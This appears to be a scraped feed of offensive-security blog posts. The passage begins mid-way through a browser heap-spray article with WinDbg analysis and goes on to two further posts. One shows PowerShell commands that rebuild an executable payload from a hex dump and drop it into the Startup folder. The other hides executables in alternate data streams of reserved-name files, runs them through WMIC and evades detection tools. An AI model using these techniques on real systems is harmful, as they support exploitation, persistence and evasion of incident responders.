        for (i=0; i<100; i++) {
            spray[i] = onemeg.substr(0, onemeg.length);
        }
    }
    </script>
    </head>
    <body>
    <input type="button" value="Spray the heap" onclick="heapspray()"></input>
    </body>
    </html>

    Run the javascript code above and follow along with the following analysis in WinDbg. Start by viewing the addresses of the heaps in Internet Explorer:

    !heap -stat

    _HEAP 00360000
         Segments            00000001
             Reserved  bytes 00100000
             Committed bytes 000f1000
         VirtAllocBlocks     00000001
             VirtAlloc bytes 035f0000
    _HEAP 035b0000
         Segments            00000001
             Reserved  bytes 00040000
             Committed bytes 00019000
         VirtAllocBlocks     00000000
             VirtAlloc bytes 00000000
    _HEAP 00750000
         Segments            00000001
             Reserved  bytes 00040000
             Committed bytes 00012000
         VirtAllocBlocks     00000000
             VirtAlloc bytes 00000000
    _HEAP 00270000
         Segments            00000001
             Reserved  bytes 00010000
             Committed bytes 00010000
         VirtAllocBlocks     00000000
             VirtAlloc bytes 00000000
    _HEAP 02e20000
         Segments            00000001
             Reserved  bytes 00040000
             Committed bytes 00001000
         VirtAllocBlocks     00000000
             VirtAlloc bytes 00000000
    _HEAP 00010000
         Segments            00000001
             Reserved  bytes 00010000
             Committed bytes 00001000
         VirtAllocBlocks     00000000
             VirtAlloc bytes 00000000

    Look at the “VirtAlloc bytes” field for a heap with a large allocation. The heap address we’re interested in is the first one – “_HEAP 00360000”

    Next, view the allocation statistics for that heap handle:

    !heap -stat -h 00360000

     heap @ 00360000
    group-by: TOTSIZE max-display: 20
        size     #blocks     total     ( %) (percent of total busy bytes)
        fffe0 65 - 64ff360  (99.12)
        40010 1 - 40010  (0.25)
        1034 10 - 10340  (0.06)
        20 356 - 6ac0  (0.03)
        494 16 - 64b8  (0.02)
        5ba0 1 - 5ba0  (0.02)
        5e4 b - 40cc  (0.02)
        4010 1 - 4010  (0.02)
        3980 1 - 3980  (0.01)
        d0 3e - 3260  (0.01)
        460 b - 3020  (0.01)
        1800 2 - 3000  (0.01)
        800 6 - 3000  (0.01)
        468 a - 2c10  (0.01)
        2890 1 - 2890  (0.01)
        78 52 - 2670  (0.01)
        10 215 - 2150  (0.01)
        1080 2 - 2100  (0.01)
        2b0 c - 2040  (0.01)
        2010 1 - 2010  (0.01)

    Our neat and tidy allocations really stand out here. There are exactly 0x65 (101 decimal) allocations of size 0xfffe0 (1 MB minus the 20 byte heap header).

    A nice feature of WinDbg is that you can view heap chunks of a particular size. The following command lists all the heaps chunks of size 0xfffe0.

    !heap -flt s fffe0

        _HEAP @ 360000
          HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
            037f0018 1fffc fffc  [00]   037f0020    fffe0 - (busy VirtualAlloc)
            038f0018 1fffc fffc  [00]   038f0020    fffe0 - (busy VirtualAlloc)
            039f0018 1fffc fffc  [00]   039f0020    fffe0 - (busy VirtualAlloc)
            03af0018 1fffc fffc  [00]   03af0020    fffe0 - (busy VirtualAlloc)
            03bf0018 1fffc fffc  [00]   03bf0020    fffe0 - (busy VirtualAlloc)
            05e80018 1fffc fffc  [00]   05e80020    fffe0 - (busy VirtualAlloc)
            05f80018 1fffc fffc  [00]   05f80020    fffe0 - (busy VirtualAlloc)
            06080018 1fffc fffc  [00]   06080020    fffe0 - (busy VirtualAlloc)
            06180018 1fffc fffc  [00]   06180020    fffe0 - (busy VirtualAlloc)
           
            0aa80018 1fffc fffc  [00]   0aa80020    fffe0 - (busy VirtualAlloc)
            0ab80018 1fffc fffc  [00]   0ab80020    fffe0 - (busy VirtualAlloc)
            0ac80018 1fffc fffc  [00]   0ac80020    fffe0 - (busy VirtualAlloc)
            0ad80018 1fffc fffc  [00]   0ad80020    fffe0 - (busy VirtualAlloc)
            0ae80018 1fffc fffc  [00]   0ae80020    fffe0 - (busy VirtualAlloc)
            0af80018 1fffc fffc  [00]   0af80020    fffe0 - (busy VirtualAlloc)
            0b080018 1fffc fffc  [00]   0b080020    fffe0 - (busy VirtualAlloc)
            0b180018 1fffc fffc  [00]   0b180020    fffe0 - (busy VirtualAlloc)
            0b280018 1fffc fffc  [00]   0b280020    fffe0 - (busy VirtualAlloc)
            0b380018 1fffc fffc  [00]   0b380020    fffe0 - (busy VirtualAlloc)
        _HEAP @ 10000
        _HEAP @ 270000
        _HEAP @ 750000
        _HEAP @ 2e20000
        _HEAP @ 35b0000

    Note how each allocation is allocated in sequential order.

    Now that we have the addresses of each heap chunk we can start to inspect memory for our 0x41’s:

    0:007> db 06b80000
    06b80000  00 00 c8 06 00 00 a8 06-00 00 00 00 00 00 00 00  ................
    06b80010  00 00 10 00 00 00 10 00-61 65 15 29 00 00 00 04  ........ae.)....
    06b80020  da ff 0f 00 41 41 41 41-41 41 41 41 41 41 41 41  ....AAAAAAAAAAAA
    06b80030  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    06b80040  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    06b80050  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    06b80060  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    06b80070  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

    You can clearly see the string length at offset 0x20 – 000fffda which is the length of the string minus the null terminator.

    Another way to analyze your heap allocations is through the fragmentation view of VMmap – one of many incredibly useful tools in the Sysinternals suite. The following image shows an allocation of 1000MB. Within the fragmentation view you can zoom in and click on individual allocations and confirm that each heap allocation (in orange) begins at an address in the form of 0xXXXX0000.


    So why is this technique so useful? This method of heap spraying is perfect when exploiting use-after-free vulnerabilities where an attacker can craft fake objects and vtable structures. A fake vtable pointer can then point to an address in the heap range – 0x11F50024 just as an example. Thus, there is no need to rely upon nops and no need to worry about EMET’s arbitrary prevention of executing 0x0C0C0C0C-style addresses. For all intents and purposes, you’ve completely bypassed ASLR protections.

    Dropping Executables with Powershell

    $
    0
    0
    Scenario: You find yourself in a limited Windows user environment without the ability to transfer binary files over the network for one reason or another. So this rules out using a browser, ftp.exe, mspaint (yes, mspaint can be used to transfer binaries), etc. for file transfer. Suppose this workstation isn't even connected to the Internet. What existing options do you have to drop binaries on the target machine? There's the tried and true debug.exe method of assembling a text file with your payload. This method limits the size of your executable to 64K however since debug.exe is a 16-bit application. Also, Microsoft has since removed debug from recent versions of Windows. Also, Didier Stevens showed how easy it to embed executables in PDFs[1]. You can convert executables to VBscript and embed in Office documents as well. These apps won't necessarily be installed on every machine. Fortunately, Starting with Windows 7 and Server 2008, Powershell is installed by default.

    Because Powershell implements the .NET framework, you have an incredible amount of power at your fingertips. I will demonstrate one use case whereby you can create an executable from a text file consisting of a hexadecimal representation of an executable. You can generate this text file using any compiled/scripting language you wish but since we're on the topic, I'll show you how to generate it in Powershell:

    PS > [byte[]] $hex = get-content -encoding byte -path C:\temp\evil_payload.exe
    PS > [System.IO.File]::WriteAllLines("C:\temp\hexdump.txt", ([string]$hex))

    The first line reads in each byte of an executable and saves them to a byte array. The second line casts the bytes in the array as strings and writes them to a text file. The resultant text file will look something like this:

    77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 232 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 0 124 58 138 68 29 84 217 68 29 84 217 68 29 84 217 99 219 41 217 66 29 84 217 99 219 47 217 79 29 84 217 68 29 85 217 189 29 84 217 99 219 58 217 71 29 84 217 99 219 57 217 125 29 84 217 99 219 40 217 69 29 84 217 99 219 44 217 69 29 84 217 82 105 99 104 68 29 84 217 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ...

    You can see that each byte is represented as a decimal (77,90 = "MZ").

    Next, once you get the text file onto the target machine (a teensy/USB HID device would be an ideal use case), Powershell can be used to reconstruct the executable from the text file using the following lines:

    PS > [string]$hex = get-content -path C:\Users\victim\Desktop\hexdump.txt
    PS > [Byte[]] $temp = $hex -split ' '
    PS > [System.IO.File]::WriteAllBytes("C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\evil_payload.exe", $temp)

    The first line reads the hex dump into a string variable. The string is then split into a byte array using <space> as a delimiter. Finally, the byte array is written back to a file and thus, the original executable is recreated.

    While writing this article, I stumbled upon Dave Kennedy and Josh Kelley's work with Powershell[2] where they stumbled upon this same method of generating executables. In fact several Metasploit payloads use a similar, albeit slicker method of accomplishing this using compression and base64 encoding. Please do check out the great work they've been doing with Powershell.

    1. Didier Stevens, "Embedding and Hiding Files in PDF Documents," July 1, 2009, http://blog.didierstevens.com/2009/07/01/embedding-and-hiding-files-in-pdf-documents/

    2. Dave Kennedy and Josh Kelley "Defcon 18 PowerShell OMFG…", August 31, 2010, http://www.secmaniac.com/august-2010/powershell_omfg/

    Stealth Alternate Data Streams and Other ADS Weirdness

    $
    0
    0
    I was reading an article on MSDN regarding the naming of files, paths, and namespaces[1] and I discovered some interesting peculiarities regarding the naming and creation of certain files containing alternate data streams.

    I started by playing around with naming files based upon reserved device names "CON, PRN, AUX, NUL, COM1, LPT1, etc." As an example:

    C:\temp>echo hi > \\?\C:\temp\NUL

    Note that this file can only be created when the prefix "\\?\" or "\\.\GLOBALROOT\Device\HarddiskVolume[n]\" is appended. Subsequently, this is also the only way to delete the file.

    This technique has been known about for over a year now and is well documented[2][3].

    What I found to be interesting is that when you create an alternate data stream that is attached to a file named after any reserved device name, the alternate data stream is invisible to both 'dir /R' and streams.exe unless you append the "\\?\" prefix to the path. Also, if the ADS happens to be an executable, it can be executed using WMIC. As an example:

    C:\temp>type C:\Windows\System32\cmd.exe > \\?\C:\temp\NUL:hidden_ADS.exe

    C:\temp>dir /r C:\temp

     Directory of C:\temp

    09/17/2011  06:35 AM    <DIR>          .
    09/17/2011  06:35 AM    <DIR>          ..
    09/17/2011  06:37 AM                 5 NUL
                   1 File(s)              5 bytes

    C:\temp>streams C:\temp

    Streams v1.56 - Enumerate alternate NTFS data streams
    Copyright (C) 1999-2007 Mark Russinovich
    Sysinternals - www.sysinternals.com

    No files with streams found.

    C:\temp>wmic process call create \\?\C:\temp\NUL:hidden_ADS.exe
    Executing (Win32_Process)->Create()
    Method execution successful.
    Out Parameters:
    instance of __PARAMETERS
    {
            ProcessId = 1620;
            ReturnValue = 0;
    };


    So what are the implications of this?

    1) You have a file that's nearly impossible to delete unless you know to append '\\?\'
    2) You can hide malicious files/executables within the device name file in an ADS that is undetectable using traditional tools.
    3) If an executable is hidden in the invisible ADS, it can be executed via WMIC.

    As an added comment, according to the same MSDN article: "characters whose integer representations are in the range from 1 through 31, except for alternate data streams where these characters are allowed." This would allow someone to create an ADS using alt-characters. As an example:

    C:\temp>echo hi > C:\temp\test.txt

    C:\temp>echo secret text > C:\temp\test.txt:^G^G^G

    C:\temp>dir /R C:\temp

     Directory of C:\temp

    09/17/2011  07:09 AM    <DIR>          .
    09/17/2011  07:09 AM    <DIR>          ..
    09/17/2011  07:08 AM                 5 test.txt
                                        14 test.txt::$DATA
                   1 File(s)              5 bytes

    C:\temp>more < C:\temp\test.txt:^G^G^G
    secret text

    The ADS is named after three system bell characters <ALT+007>. Therefore, nothing is printed but a directory listing would yield three audible beeps. Hehe. Nothing mind-blowing but just another way to mess with admins or incident handlers.


    Happy ADS created using <ALT-002>

    The bottom line: these techniques would serve as both a good malware persistence mechanism and serve to frustrate any incident handler.

    1. Microsoft, "Naming Files, Paths, and Namespaces", http://msdn.microsoft.com/en-us/library/aa365247(VS.85).aspx

    2. Dan Crowley, "Windows File Pseudonyms," April 2010, http://www.sourceconference.com/publications/bos10pubs/Windows%20File%20Pseudonyms.pptx

    3. Mark Baggett, "NOT A CON!!!! (it's a backdoor)," February, 15 2010, http://pauldotcom.com/2010/02/deleting-the-undeleteable.html
    Viewing all 78 articles
    Browse latest View live